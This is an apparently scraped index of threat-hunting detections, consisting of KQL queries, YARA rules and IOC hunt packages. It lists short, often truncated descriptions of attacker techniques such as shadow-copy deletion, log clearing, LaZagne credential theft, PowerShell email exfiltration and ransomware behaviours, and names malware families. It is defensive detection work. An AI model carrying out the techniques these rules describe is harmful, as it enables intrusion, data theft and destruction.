DeviceProcessEvents
Look for adding a user to Administrators in remote desktop users via PowerShell.
ARS Ransomware Event triggered
kql medium
T1486
DeviceEvents
This rule detects when the ASR rule AsrRansomwareBlocked or AsrRansomwareAudited is triggered. No alert is generated by default. This could be the start of a ransomware attack. Additional information
Backup deletion
kql medium
DeviceProcessEvents
This query identifies use of wmic.exe to delete shadow copy snapshots prior to encryption.
DeviceProcessEvents
Instead of running several queries separately, you can also use a comprehensive query that checks for multiple signs of ransomware activity to identify affected devices. The following consolidated que
DeviceProcessEvents
This query checks for attempts to clear at least 10 log entries from event logs using wevtutil.
DeviceProcessEvents
Search for the creation of a new user using a known DEV-0270 username/password schema.
DarkSide
kql medium
DeviceProcessEvents
Use this query to look for running DarkSide ransomware behavior in the environment
DeviceProcessEvents
This query checks for attempts to delete data on multiple drives using cipher.exe. This activity is typically done by ransomware to prevent recovery of data after encryption.
Disabling Services via Registry
kql medium
DeviceProcessEvents
Search for processes modifying the registry to disable security features.
Discovery for highly-privileged accounts
kql medium
DeviceProcessEvents
Use this query to locate commands related to discovering highly privileged users in an environment, sometimes a precursor to ransomware
Distribution from remote location
kql medium
AlertEvidence
This query checks for alerts related to file drop and remote execution where the file name matches PsExec and similar tools used for distribution
DLLHost.exe file creation via PowerShell
kql medium
DeviceProcessEvents
Identify masqueraded DLLHost.exe file created by PowerShell.
DLLHost.exe WMIC domain discovery
kql medium
DeviceProcessEvents
Identify dllhost.exe using WMIC to discover additional hosts and associated domain.
Email data exfiltration via PowerShell
kql medium
DeviceProcessEvents
Identify email exfiltration conducted by PowerShell.
Fake Replies
kql medium
EmailEventsEmailUrlInfo
Use this query to find spoofed reply emails that contain certain keywords in the subject. The emails are also checked for a link to a document in Google Docs. These attacks have been observed leading
File Backup Deletion Alerts
kql medium
AlertEvidence
This query checks alerts related to file backup deletion and enriches with additional alert evidence information
Gootkit File Delivery
kql medium
AlertEvidenceDeviceNetworkEvents
This query surfaces alerts related to Gootkit and enriches with command and control information, which has been observed delivering ransomware.
HTA Startup Persistence
kql medium
DeviceFileEvents
Use this query to locate persistence in Startup with HTA files.
IcedId attachments
kql medium
EmailAttachmentInfoEmailEvents
Use this query to locate emails with subject indicators of a reply or forward, and the attachment is a .doc, or a .zip containing a .doc. Review results for suspicious emails. IcedId can lead to ranso
IcedId Delivery
kql medium
DeviceFileEvents
Use this query to locate successful delivery of associated malicious downloads that can lead to ransomware
IcedId email delivery
kql medium
EmailEventsEmailUrlInfo
Use this query to locate emails and malicious downloads related to the IcedId activity that can lead to ransomware
LaZagne Credential Theft
kql medium
DeviceProcessEvents
Use this query to locate processes executing credential theft activity, often LaZagne in ransomware compromises.
DeviceProcessEvents
Adversaries are likely leaving ransomware notification messages in the registry to communicate demands, a common tactic to
AlertEvidenceDeviceLogonEvents
Use this query to look for alerts related to suspected ransomware and Cobalt Strike activity, a tool used in numerous ransomware campaigns
DeviceProcessEvents
Identify PowerShell creating an exclusion path of ProgramData directory for Microsoft Defender to not monitor.
Qakbot discovery activies
kql medium
DeviceProcessEvents
Use this query to locate injected processes launching discovery activity. Qakbot has been observed leading to ransomware in numerous instances.
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
The detection
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
Shadow Copy Deletions
kql medium
T1490
DeviceProcessEvents
This rule detects when Shadow Copies are being deleted. This is a know actions that is performed by TA. This query detects know commands that have been used by the ransomware actors. Some information
Sticky Keys
kql medium
A technique used in numerous ransomware attacks is a Sticky Keys hijack for privilege escalation/persistence. Surface realted alerts with this query.
Stopping multiple processes using taskkill
kql medium
DeviceProcessEvents
This query checks for attempts to stop at least 10 separate processes using the taskkill.exe utility. Run query
Stopping processes using net stop
kql medium
DeviceProcessEvents
This query checks for attempts to stop at least 10 separate processes using the net stop command. Run query
Suspicious Bitlocker Encryption
kql medium
DeviceProcessEvents
Looks for potential instances of bitlocker modifying registry settings to allow encryption, where it's executed via a .bat file.
Suspicious Google Doc Links
kql medium
EmailEventsEmailUrlInfo
Use this query to find emails with message IDs that resemble IDs used in known attack emails and contain a link a document in Google Docs. These behaviors have been observed leading to ransomware atta
Suspicious Image Load related to IcedId
kql medium
DeviceImageLoadEvents
The hypothesis
ThreatFox: Antidot IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 4 IOCs associated with Antidot
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 87 IOCs associated with ClearFake
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with FAKEUPDATES
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 8 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DeviceFileEventsDnsEventsUrlClickEvents
Hunt package for 10 IOCs associated with Unknown Stealer
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 11 IOCs associated with AsyncRAT
ThreatFox: Chaos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Chaos
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 50 IOCs associated with Cobalt Strike
ThreatFox: Xtreme RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Xtreme RAT is a remote access Trojan that enables attackers to execute commands,
ThreatFox: Eye Pyramid IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Eye Pyramid
ThreatFox: RansomHub IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with RansomHub
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 11 IOCs associated with Remcos
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with SectopRAT
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with VShell
Turning off services using sc exe
kql medium
DeviceProcessEvents
This query checks for attempts to turn off at least 10 existing services using sc.exe.
Turning off System Restore
kql medium
DeviceProcessEvents
This query identifies attempts to stop System Restore and prevent the system from creating restore points, which can be used to recover data encrypted by ransomware
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 41 malicious URLs tagged as 32-bit
URLhaus: base64 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "base64" malware family is a downloader that uses base64 encoding to obfuscate payloads, often delivering additional malicious
URLhaus: bat Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as bat
URLhaus: botnetdomain Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as botnetdomain
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 28 malicious URLs tagged as elf
URLhaus: exe Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as exe
URLhaus: jar Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as jar
URLhaus: js Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 14 malicious URLs tagged as js
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 56 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as Mozi
CloudAppEvents
The query looks for users or service principals that attached an uncommon credential type to application. As part of the Nobelium campaign, the attacker added credentials to already existing applicati
Antivirus detections (1)
kql medium
AlertEvidence
Query for Microsoft Defender Antivirus detections. Query #1: Query for Antivirus detection events.
Antivirus detections
kql medium
DeviceEvents
The rule detects potential adversary attempts to evade detection by triggering Microsoft Defender Antivirus alerts, which may indicate the presence of malicious software or evasion techniques. SOC teams should proactively hunt for
AV Detections with Source
kql medium
DeviceEventsDeviceFileEvents
This query shows the source of the AV detections (e.g., the website the file was downloaded from etc.). Get the list of AV detections.
AV Detections with USB Disk Drive
kql medium
DeviceEvents
This query make a best-guess detection regarding which removable media device caused an AV detection. The query is best run over 30 days to get the full USB history. Get a list of USB AV detections. T
Control32
yara low
YARA rule: Control32
Control64
yara low
YARA rule: Control64
cve-2019-0808-c2
kql medium
DeviceNetworkEvents
This query was originally published in the threat analytics report, Windows 7 zero-day for CVE-2019-0808 CVE-2019-0808 is a vulnerability that allows an attacker to escape the Windows security sandbox
cve-2019-0808-nufsys-file creation
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, Windows 7 zero-day for CVE-2019-0808 CVE-2019-0808 is a vulnerability that allows an attacker to escape the Windows security sandbox
cve-2019-0808-set-scheduled-task
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Windows 7 zero-day for CVE-2019-0808 CVE-2019-0808 is a vulnerability that allows an attacker to escape the Windows security sandbox
dell-driver-vulnerability-2021
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, Multiple EOP flaws in Dell driver (CVE-2021-21551). CVE-2021-21551 is a vulnerability found in dbutil_2_3.sys, a driver distributed
DeviceProcessEvents
This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub
detect-cve-2019-0973-installerbypass-exploit
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub
detect-cve-2019-1053-sandboxescape-exploit
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub
detect-cve-2019-1069-bearlpe-exploit
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub
detect-cve-2019-1129-byebear-exploit
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, May 2019 0-day disclosures. In May and June of 2019, a security researcher with the online alias, SandboxEscaper, discovered and pub
ExploitGuardAsrDescriptions
kql medium
DeviceEvents
Expanding on DeviceEvents output with Attack Surface Reduction (ASR) rule descriptions. The ActionType values of the ASR events already explain what rule was matched and if it was audited or blocked.
ExploitGuardASRStats (1)
kql medium
DeviceEvents
Get stats on ASR audit events - count events and machines per rule.
ExploitGuardASRStats
kql medium
DeviceEvents
Get stats on ASR audit events - count events and machines per rule.
ExploitGuardASRStats (2)
kql medium
DeviceEvents
Get stats on ASR audit events - count events and machines per rule.
ExploitGuardBlockOfficeChildProcess
kql medium
DeviceEvents
These queries check telemetry from the Exploit Guard rule: Rule: Block Office applications from creating child processes. (Rule ID d4f940ab-401b-4efc-aadc-ad5f3c50688a). Read more about it here: https
ExploitGuardBlockOfficeChildProcess (1)
kql medium
AlertEvidenceDeviceEvents
These queries check telemetry from the Exploit Guard rule: Rule: Block Office applications from creating child processes. (Rule ID d4f940ab-401b-4efc-aadc-ad5f3c50688a). Read more about it here: https
ExploitGuardBlockOfficeChildProcess (2)
kql medium
DeviceEvents
These queries check telemetry from the Exploit Guard rule: Rule: Block Office applications from creating child processes. (Rule ID d4f940ab-401b-4efc-aadc-ad5f3c50688a). Read more about it here: https
ExploitGuardBlockOfficeChildProcess (3)
kql medium
AlertEvidenceDeviceEvents
These queries check telemetry from the Exploit Guard rule: Rule: Block Office applications from creating child processes. (Rule ID d4f940ab-401b-4efc-aadc-ad5f3c50688a). Read more about it here: https
ExploitGuardControlledFolderAccess (1)
kql medium
DeviceEvents
Total Controlled Folder Access events.
ExploitGuardControlledFolderAccess (2)
kql medium
DeviceEvents
Total Controlled Folder Access events.
ExploitGuardControlledFolderAccess
kql medium
DeviceEvents
Total Controlled Folder Access events.
ExploitGuardNetworkProtectionEvents
kql medium
DeviceEvents
Simple query to show the unique network connections that were audited or blocked by ExploitGuard. For more questions on this query, feel free to ping @FlyingBlueMonki on twitter or mattegen@microsoft.
ExploitGuardStats (1)
kql medium
DeviceEvents
Get stats on ExploitGuard blocks - count events and machines per rule.
ExploitGuardStats
kql medium
DeviceEvents
Get stats on ExploitGuard blocks - count events and machines per rule.
FiveEyes QUERTY Malware - file 20120.xml
FiveEyes QUERTY Malware - file 20120_cmdDef.xml
FiveEyes QUERTY Malware - file 20120.dll.bin
FiveEyes QUERTY Malware - file 20121_cmdDef.xml
GH PM32
yara low
YARA rule: GH_PM32
GH PM64
yara low
YARA rule: GH_PM64
DeviceFileEvents
This query was originally published in the threat analytics report, ALPC local privilege elevation. Windows ALPC Elevation of Privilege Vulnerability, CVE-2018-8440, could be exploited to run arbitrar
MemStub32
yara low
YARA rule: MemStub32
MemStub32 GH1
yara low
YARA rule: MemStub32_GH1
MemStub64
yara low
YARA rule: MemStub64
MemStub64 GH1
yara low
YARA rule: MemStub64_GH1
msvcrt Win7AMD64
yara low
YARA rule: msvcrt_Win7AMD64
msvcrt Win7x86
yara low
YARA rule: msvcrt_Win7x86
msvcrt WIN8AMD64
yara low
YARA rule: msvcrt_WIN8AMD64
msvcrt WIN8x86
yara low
YARA rule: msvcrt_WIN8x86
msvcrt WinXPx86
yara low
YARA rule: msvcrt_WinXPx86
Network Win7AMD64
yara low
YARA rule: Network_Win7AMD64
Network Win7x86
yara low
YARA rule: Network_Win7x86
Network WinXPx86
yara low
The 'Network_WinXPx86' YARA rule detects malicious artifacts or behaviors associated with Windows XP x86 environments, likely targeting legacy systems or remnants of outdated infrastructure. SOC teams should deploy this rule in endpoint
PUA ThreatName per Computer
kql medium
DeviceEvents
Today MDE Alerts do not show PUA/WDAV ThreatName. This is a demonstration of how to get, for example, PUA Threat Names.
RabbitStew32
yara low
YARA rule: RabbitStew32
RabbitStew64
yara low
YARA rule: RabbitStew64
Risky Sign-in with ElevateAccess
kql medium
CloudAppEvents
Looks for users who had a risky sign in (based on Entra ID Identity Protection risk score) and then performed and ElevateAccess action. ElevateAccess operations can be used by Global Admins to obtain
Risky Sign-in with new MFA method
kql medium
CloudAppEvents
Looks for a new MFA method added to an account that was preceded by medium or high risk sign-in session for the same user within maximum 6h timeframe
SAM-Name-Changes-CVE-2021-42278
kql medium
IdentityDirectoryEvents
The following query detects possible CVE-2021-42278 exploitation by finding changes of device names in the network using Microsoft Defender for Identity
scheduled task creation
kql medium
DeviceEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_schtask_creation.yml. Questions via Twitter: @janvonkirchheim.
ServicePrincipalAddedToRole [Nobelium]
kql medium
CloudAppEvents
Adversaries may be leveraging compromised service principals to gain elevated privileges by adding them to privileged
SmartScreen app block ignored by user
kql medium
DeviceEvents
Query for SmartScreen application blocks on files with "Malicious" reputation, where the user has decided to run the malware nontheless. Read more about SmartScreen here: https://docs.microsoft.com/wi
SmartScreen URL block ignored by user
kql medium
DeviceEventsDeviceFileEvents
Query for SmartScreen URL blocks, where the user has decided to run the malware nontheless. An additional optional filter is applied to query only for cases where Microsoft Edge has downloaded a file
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 82 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEvents
Hunt package for 11 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with Unknown Loader
ThreatFox: Unknown RAT IOCs
ioc-hunt high
DnsEvents
The "Unknown RAT" malware is a remote access trojan designed to exfiltrate data, execute commands, and establish persistent backdoors on infected systems. It typically arrives via phishing emails containing
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 20 IOCs associated with Unknown Stealer
ThreatFox: ACR Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with ACR Stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 20 IOCs associated with AsyncRAT
ThreatFox: Brute Ratel C4 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Brute Ratel C4
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with DCRat
ThreatFox: MaskGramStealer IOCs
ioc-hunt high
DnsEvents
MaskGramStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames, passwords, and cryptocurrency wallet information from infected systems. It typically arrives via phishing emails containing malicious links or attachments that deploy the malware through exploit kits or compromised websites. SOC analysts should monitor for unusual outbound connections to the associated domains, anom
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with NetSupportManager RAT
ThreatFox: Remus IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 14 IOCs associated with Remus
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with SectopRAT
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Sliver
ThreatFox: Tofsee IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Tofsee
ThreatFox: ValleyRAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 67 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with VShell
URLhaus: 176-65-139-107 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 176-65-139-107
URLhaus: 176-65-139-119 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 176-65-139-119
URLhaus: 176-65-139-219 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as 176-65-139-219
URLhaus: 192-159-99-249 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 192-159-99-249
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 71 malicious URLs tagged as 32-bit
URLhaus: 45-88-186-114 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 45-88-186-114
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 14 malicious URLs tagged as Mozi
URLhaus: sh Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as sh
Vbr
yara low
YARA rule: Vbr
wadhrama-ransomware
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, RDP ransomware persists as Wadhrama. The ransomware known as Wadhrama has been used in human-operated attacks that follow a particul
Tt1574
DeviceFileEvents
The query for malicious file creations via TOCTOU Vulnerability in Leading Endpoint Detection and Response (EDR) and Antivirus (AV) Solutions. - Microsoft Defender (CVE-2022-37971) - Defender for Endp
Windows filtering events (Firewall)
kql medium
DeviceEvents
Get all filtering events done by the Windows filtering platform. This includes any blocks done by Windows Firewall rules, but also blocks triggered by some 3rd party firewalls. When no Firewall rules
Accessibility Features
kql medium
DeviceFileEventsDeviceProcessEventsDeviceRegistryEvents
This query looks for persistence or priviledge escalation done using Windows Accessibility features. It covers some of the techniques that could be used to utilize these features for malicious purpose
Account brute force (1)
kql medium
DeviceLogonEvents
Query #1: Look for public IP addresses that failed to logon to a computer multiple times, using multiple accounts, and eventually succeeded.
Account brute force
kql medium
DeviceLogonEvents
Query #1: Look for public IP addresses that failed to logon to a computer multiple times, using multiple accounts, and eventually succeeded.
Active Directory Account lockout and unlocks
kql medium
IdentityDirectoryEvents
This query lists Active Directory accounts lockout and unlock events
CloudAppEvents
Added credential from country X and Signed-In from country Y in a pecific time window: This query tries to find all applications that credentials were added to them from country X while the applicatio
Rule to detect the crypto library used in Equation group malware
Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW
Rule to detect the EquationLaser malware
Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW
Rule to detect Equation group's keyword in executable file
Backdoored ssh
yara low
YARA rule: Backdoored_ssh
backup-deletion
kql medium
This query was originally published in the threat analytics report, Ransomware continues to hit healthcare, critical services. There is also a related blog. In April of 2020, security researchers obse
EmailAttachmentInfo
Check if file hashes published in the recent abuse.ch feed are found in your mail flow scanned by Office 365 ATP.
Create account (1)
kql medium
DeviceEvents
User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/Technique/T1136. Tags: #CreateAccount. Query #1: Query for users being created using "ne
Create account
kql medium
DeviceProcessEvents
User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/Technique/T1136. Tags: #CreateAccount. Query #1: Query for users being created using "ne
CloudAppEvents
Credentials were added to an application by UserA, after the application was granted admin consent rights by UserB The Nobelium activity group has been observed adding credentials (x509 keys or passwo
Defender for Endpoint Telemetry
kql medium
DeviceNetworkEvents
View Defender for Endpoint telemetry URLs and their connection status, view trendline over 30 days. Use to investigate possible telemetry and/or connectivity issues. [email protected].
detect-bluekeep-exploitation-attempts
kql medium
DeviceNetworkEvents
This query was originally published in the threat analytics report, Exploitation of CVE-2019-0708 (BlueKeep). CVE-2019-0708, also known as BlueKeep, is a critical remote code execution vulnerability i
Detect DNS obfuscation using @ symbol
kql medium
EmailUrlInfo
One of the tricks used in phishing is obfuscating the domain name in a URL by using the @ symbol. This technique goes all the way back to the original RFC for URLs, RFC 1738. When you specify an @ in
detect-impacket-wmipersist
kql medium
T1546.003
DeviceEvents
This query looks for signs of impacket wmipersist usage and should work for other wmi based persistence methods. Requires analysis. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-pa
detect-mailsniper
kql medium
DeviceNetworkEventsDeviceProcessEvents
This query was originally published in the threat analytics report, MailSniper Exchange attack tool. MailSniper is a tool that targets Microsoft Exchange Server. The core function is to connect to Exc
detect-prifou-pua
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in the threat analytics report, ironSource PUA & unwanted apps impact millions. IronSource provides software bundling tools for many popular legitimate apps, such a
detect-suspicious-rdp-connections
kql medium
DeviceNetworkEvents
This query was originally published in the threat analytics report, Exploitation of CVE-2019-0708 (BlueKeep). CVE-2019-0708, also known as BlueKeep, is a critical remote code execution vulnerability i
Device Logons from Unknown IPs
kql medium
DeviceLogonEventsIdentityLogonEvents
Device Logons from Unknown IP Addresses. This query identifies device logons from IP addresses not associated with any machine in Defender ATP.
doppelpaymer-psexec
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Doppelpaymer: More human-operated ransomware. There is also a related blog. DoppelPaymer is ransomware that is spread manually by hu
Equation Group Malware - DoubleFantasy
Equation Group Malware - EoP package and malware launcher
Equation Group Malware - EquationDrug installer LUTEUSOBSTOS
Equation Group Malware - EquationLaser Installer
Equation Group Malware - Fanny Worm
yara low
Equation Group Malware - Fanny Worm
Equation Group Malware - Grey Fish
yara low
Equation Group Malware - Grey Fish
Equation Group Malware - GROK keylogger
Equation Group Malware - HDD reprogramming module
Equation Group Malware - suspicious string found in sample
Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW
Equation Group Malware - TripleFantasy Loader
EquationDrug - Unilay.DLL
yara low
EquationDrug - Unilay.DLL
EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys
EquationDrug - HDD/SSD firmware operation - nls_933w.dll
EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys
EquationDrug - Key/clipboard logger driver - msrtvd.sys
EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys
EquationDrug - Network Sniffer - tdip.sys
EquationDrug - Network Sniffer - tdip.sys
EquationDrug - Network-sniffer/patcher - atmdkdrv.sys
EquationDrug - Network-sniffer/patcher - atmdkdrv.sys
EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll
EquationDrug - Collector plugin for Volrec - msrstd.sys
files-from-malicious-sender
kql medium
DeviceFileEventsEmailAttachmentInfo
This query checks devices for the presence of files that have been sent by a known malicious sender. To use this query, replace the email address with the address of the known malicious sender.
FiveEyes QUERTY Malware - file 20121.xml
FiveEyes QUERTY Malware - file 20123.xml
FiveEyes QUERTY Malware - file 20121.dll.bin
FiveEyes QUERTY Malware - file 20123_cmdDef.xml
FiveEyes QUERTY Malware - file 20123.sys.bin
ImpersonatedUserFootprint
kql medium
AlertEvidenceDeviceLogonEvents
Microsoft Defender for Identity raises alert on suspicious Kerberos ticket, pointing to a potential overpass-the-hash attack. Once attackers gain credentials for a user with higher privileges, they wi
insider-threat-detection-queries (12)
kql medium
DeviceEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (13)
kql medium
DeviceProcessEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (14)
kql medium
DeviceProcessEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (15)
kql medium
DeviceLogonEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (16)
kql medium
DeviceFileEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (17)
kql medium
DeviceLogonEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (18)
kql medium
EmailAttachmentInfoEmailEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (19)
kql medium
DeviceEventsDeviceLogonEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (2)
kql medium
DeviceFileEventsDeviceProcessEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (3)
kql medium
DeviceProcessEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (4)
kql medium
DeviceEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (5)
kql medium
DeviceNetworkEvents
Intent: - Use MTP capability to look for insider threat potential risk indicators - Indicators would then serve as the building block for insider threat risk modeling in subsequent tools Definition of
insider-threat-detection-queries (6)
kql medium
DeviceNetworkEvents
